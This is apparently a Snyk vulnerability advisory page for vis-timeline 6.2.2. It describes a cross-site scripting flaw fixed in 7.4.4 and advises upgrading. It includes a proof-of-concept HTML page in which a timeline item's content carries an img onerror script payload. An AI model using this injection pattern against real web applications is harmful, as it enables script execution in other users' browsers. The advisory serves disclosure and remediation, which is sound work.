vis-timeline@6.2.2 vulnerabilities

Create a fully customizable, interactive timeline with items and ranges.

  • latest version

    7.7.3

  • latest non vulnerable version

  • first published

    5 years ago

  • latest version published

    1 years ago

  • licenses detected

  • Direct Vulnerabilities

    Known vulnerabilities in the vis-timeline package. This does not include vulnerabilities belonging to this package’s dependencies.

    How to fix?

    Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

    Fix for free
    VulnerabilityVulnerable Version
    • M
    Cross-site Scripting (XSS)

    vis-timeline is a Timeline/Graph2D is an interactive visualization chart to visualize data in time

    Affected versions of this package are vulnerable to Cross-site Scripting (XSS). An attacker with the ability to control the items of a Timeline element can inject additional script code into the generated application.

    PoC

    <!DOCTYPE html>
    <html>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/vis-timeline/7.4.3/vis-timeline-graph2d.min.js" integrity="sha512-3FADGlV0gOpnQn56VOryrvOeY1zMrNiSMyDnxD/5ZEBJgt5n+IcAvfzm16/Cwyhro9RJgFgBWeoUmLceNgbTrA==" crossorigin="anonymous"></script>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/vis-timeline/7.4.3/vis-timeline-graph2d.css" integrity="sha512-GFG4HXPbPcM487tbwN4sscz1AVK9uQcY7Y6uWwLlgWbAXCJI2V/n7Em7vKpH+Q1cqQh1PyCavHr94KaWi0UgOA==" crossorigin="anonymous" />
        
        <body>
    <style>
    body,
    html {
      font-family: sans-serif;
    }
    </style>
    <p>A basic timeline. You can move and zoom the timeline, and select items.</p>
    <div id="visualization"></div>
    <script>
    // DOM element where the Timeline will be attached
    var container = document.getElementById("visualization");
    
    // Create a DataSet (allows two way data-binding)
    var items = new vis.DataSet([
      { id: 1, content: "item<img src='xxx' onerror='alert(/XSS/);' />", start: "2014-04-20" },
      { id: 2, content: "item 2", start: "2014-04-14" },
      { id: 3, content: "item 3", start: "2014-04-18" },
      { id: 4, content: "item 4", start: "2014-04-16", end: "2014-04-19" },
      { id: 5, content: "item 5", start: "2014-04-25" },
      { id: 6, content: "item 6", start: "2014-04-27", type: "point" },
    ]);
    
    // Configuration for the Timeline
    var options = {};
    var timeline = new vis.Timeline(container, items, options);
    </script>
    
        </body>
    </html>
    

    How to fix Cross-site Scripting (XSS)?

    Upgrade vis-timeline to version 7.4.4 or higher.

    <7.4.4